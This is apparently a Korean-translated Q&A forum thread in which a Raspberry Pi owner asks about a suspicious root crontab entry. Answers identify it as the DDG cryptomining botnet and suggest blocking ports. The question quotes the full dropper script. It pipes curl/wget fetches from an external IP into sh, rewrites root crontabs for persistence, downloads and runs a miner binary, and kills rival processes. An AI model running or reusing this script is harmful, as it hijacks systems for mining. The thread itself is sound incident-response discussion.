의심스러운 crontab 항목이 15분마다 "xribfa4"를 실행합니다.

tag-icon tag-icon security cron malware
의심스러운 crontab 항목이 15분마다 "xribfa4"를 실행합니다.

Raspberry Pi의 루트 crontab 파일에 일부 콘텐츠를 추가하고 싶었고 의심스러워 보이는 항목을 발견했는데 일부를 인터넷에서 검색해도 아무 것도 나오지 않았습니다.

크론탭 항목:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

그 내용은 http://103.219.112.66:8000/i.sh다음과 같습니다:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

내 Linux 지식은 제한되어 있지만 인도네시아 서버에서 바이너리를 다운로드하여 정기적으로 루트로 실행하는 것은 드문 것 같습니다.

이건 뭐죠? 어떻게 해야 합니까?

답변1

DDG 마이닝 봇넷과 작동 방식은 다음과 같습니다.

  1. RCE 취약점 악용
  2. 크론탭 수정
  3. 적합한 마이닝 프로그램 다운로드(go로 작성됨)
  4. 마이닝 프로세스 시작

DDG: 데이터베이스 서버를 노리는 마이닝 봇넷

SystemdMiner 봇넷이 다른 봇넷의 인프라를 빌릴 때

상층 및 하층:AWS EC2 인스턴스에서 미나드 악성 코드를 어떻게 제거합니까? (감염된 서버)

답변2

실제로 필요한 TCP 및 UDP 포트를 확인한 다음 라우터 방화벽에서 다른 모든 포트를 차단하세요.가능한, 해당 crontab 항목은 다시 나타나지 않습니다.

다음 명령을 사용하면 어떤 포트가 열려 있고 공개되어 있는지 확인할 수 있습니다.방패를 세워라!grc.com 주제.

사용하지 않는 포트를 먼저 차단하지 않으면 패치를 시도할 때 다시 감염될 수 있습니다.

관련 정보